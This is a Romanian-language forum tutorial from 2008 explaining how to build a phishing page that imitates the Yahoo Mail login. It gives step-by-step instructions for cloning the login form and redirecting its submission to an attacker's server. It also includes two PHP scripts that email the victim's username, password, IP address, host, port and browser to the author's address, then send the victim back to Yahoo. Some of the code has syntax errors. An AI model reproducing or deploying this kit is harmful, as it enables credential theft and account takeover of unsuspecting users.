|
...:::Dak tot vreti sa "spargeti" parole;) si nu numhai.....aflati
si alte date importante :-j:::...
Cum Sa Faci Un Scam Page
1) Pentru
inceput sa va zic cateva chesti :
- tr sa aveti habar de notiuni html de baza {pe draq tr sa shti modifica unde va zic
yo Smile) }
- este foarte simplu
- tutorialu este 100% © Y2K
- iti tr 2 siteuri pe net 1 pe lx iar celalat pe 00server.com
{sau orice site Very Happy}
2) Ce Este Un Scam Page ?
Scam Page: este o pagina flasa, cu care poti afla date destul
de inportante despre cineva
{in acest tutorial voi prezenta un Yahoo Mail Scam Page}
3) Hai Sa Facem Pagina
Scam{partea I [faza in html]}
acum trebuie sa intram pe site-ul respectiv(in exemplu nostru mail.yahoo.com), apasam
ctrl + u {o
sa ne arate sursa pagini} iar noi nu tr decat sa selectam tot{absolut tot} si sa intram in
notepad
si dam paste.
Noi am copiat pagina iar acum o sa trebuiasca sa cautam linia: <fieldset>
<legend>Login Form</legend>
<form
method="post" action="https://login.yahoo.com/config/login?" autocomplete="off"
name="login_form">
<input
type="hidden" name=".tries" value="1">
<input type="hidden" name=".src" value="ym">
<input type="hidden"
name=".md5" value="">
<input type="hidden" name=".hash" value="">
<input type="hidden" name=".js" value="">
<input
type="hidden" name=".last" value="">
<input type="hidden" name="promo" value="">
<input type="hidden" name=".intl"
value="us">
<input type="hidden" name=".bypass" value="">
<input type="hidden" name=".partner" value="">
<input
type="hidden" name=".u" value="fvbi1kp2qhfik">
<input type="hidden" name=".v" value="0">
<input type="hidden"
name=".challenge"
value="EcsMm4_xIivGoDgBoxxTDyOfV4T9">
<input type="hidden" name=".yplus" value="">
<input
type="hidden" name=".emailCode" value="">
<input type="hidden" name="pkg" value="">
<input type="hidden"
name="stepid" value="">
<input type="hidden" name=".ev" value="">
<input type="hidden" name="hasMsgr" value="0">
<input
type="hidden" name=".chkP" value="Y">
<input type="hidden" name=".done" value="http://mail.yahoo.com">
<input
type="hidden" name=".pd" value="ym_ver%3d0">
din ea tr sa shtergi <input type="hidden" name=".tries" value="1">
<input
type="hidden" name=".src" value="ym">
<input type="hidden" name=".md5" value="">
<input type="hidden" name=".hash"
value="">
<input type="hidden" name=".js" value="">
<input type="hidden" name=".last" value="">
<input
type="hidden" name="promo" value="">
<input type="hidden" name=".intl" value="us">
<input type="hidden"
name=".bypass" value="">
<input type="hidden" name=".partner" value="">
<input type="hidden" name=".u" value="fvbi1kp2qhfik">
<input
type="hidden" name=".v" value="0">
<input type="hidden" name=".challenge"
value="EcsMm4_xIivGoDgBoxxTDyOfV4T9">
<input
type="hidden" name=".yplus" value="">
<input type="hidden" name=".emailCode" value="">
<input type="hidden"
name="pkg" value="">
<input type="hidden" name="stepid" value="">
<input type="hidden" name=".ev" value="">
<input
type="hidden" name="hasMsgr" value="0">
<input type="hidden" name=".chkP" value="Y">
<input type="hidden"
name=".done" value="http://mail.yahoo.com">
<input type="hidden" name=".pd" value="ym_ver%3d0">
iar
la linia: <form method="post" action="https://login.yahoo.com/config/login?"
autocomplete="off" name="login_form">
tr scris in loc de
https://login.yahoo.com/config/login? tr sa scri
http://siteuldepelx.lx.ro/s.php
p.s. ar fi de preferat sa shtergi si linia
Code:
<script language="JavaScript"
type="text/javascript">if(document.getElementById)
document.getElementById('username').focus();</script>
cam
atata aicea in index.html Very Happy
4)s.php {partea ce iti trimite in email user, parola + ip(o sa mai poti
adauga
si alte date ... )}
Code:
<?php
$ip = getenv("REMOTE_ADDR");
$message .= "User : ".$_POST['login']."n";
$message
.= "PassWord: " .$_POST['passwd']."n";
$recipient = "hackeru_dani @ yahoo.com";
$subject = "New
Losser";
$headers = "From: ";
$headers .= $_POST['eMailAdd']."n";
$headers .= "MIME-Version: 1.0n";
mail("$cc",
"yahoo Info", $message);
if (mail($recipient,$subject,$message,$headers))
{
header("Location: http://www.mail.yahoo.com");
}
else
{
echo "ERROR! Please go back and try again.";
}
?>
in loc de E-mail tr
sa scrii email`u tau Very Happy
Cam Asta a fost tot, acum poti sa iti faci scam page Very Happy
acum
celelate varabilitati din afara de ip Very Happy :
dar cum puteti si vedea pentru a aparea ip`u o fost scris $ip =
getenv['REMOTE_ADDR']; , exact
cam acelasi lutru tr si pentru restu nu conteaza daca scrie "$ip= ..." poate sa scrie
"$fuck=
..." dar conteaza mult ce scrie dupa egal, cam ce scrie dupa egal tr sa aiba forma
$_SERVER['NUME_NUME'];
unde nume poate fi :
SERVER_ADDR - adresa serverului pe care e rulat scriptul
HTTP_USER_AGENT - browserul folosit
de client
REMOTE_HOST - ca REMOTE_ADDR, doar ca iti returneaza hostul, nu IP-ul
REMOTE_PORT - portul pe partea
de client care este folosit pentru comunicarea cu serverul
PHP_AUTH_USER si PHP_AUTH_PW sunt folosite cand te autentifici
prin apache ( .htaccess ). Iti
spune userul si parola care le-ai introdus in caseta de dialog.
restu pot fi
gasite
AICEA
iti dau un ex pentru s.php cu cam multe prosti de alea:
Code:
<?php
$ip
= getenv("REMOTE_ADDR");
$bro = $_SERVER['HTTP_USER_AGENT'];
$host = $_SERVER['REMOTE_HOST'];
$port = $_SERVER['REMOTE_PORT'];
$message
.= "User : ".$_POST['login']."n";
$message .= "PassWord: " .$_POST['passwd']."n";
$message .= "IP: ".$ip"n "
$message
.= "host: ".$host"n";
$message .= "browserul: ".$bro"n";
$message .= "PORT: ".$port"n";
$recipient = "hackeru_dani
@ yahoo.com";
$subject = "New Losser";
$headers = "From: ";
$headers .= $_POST['eMailAdd']."n";
$headers .= "MIME-Version:
1.0n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: http://www.mail.yahoo.com");
}
else
{
echo "ERROR! Please go back and try again.";
}
?>
bafta si nu uita © Y2K
2008 ~DeXtEr~ 
|
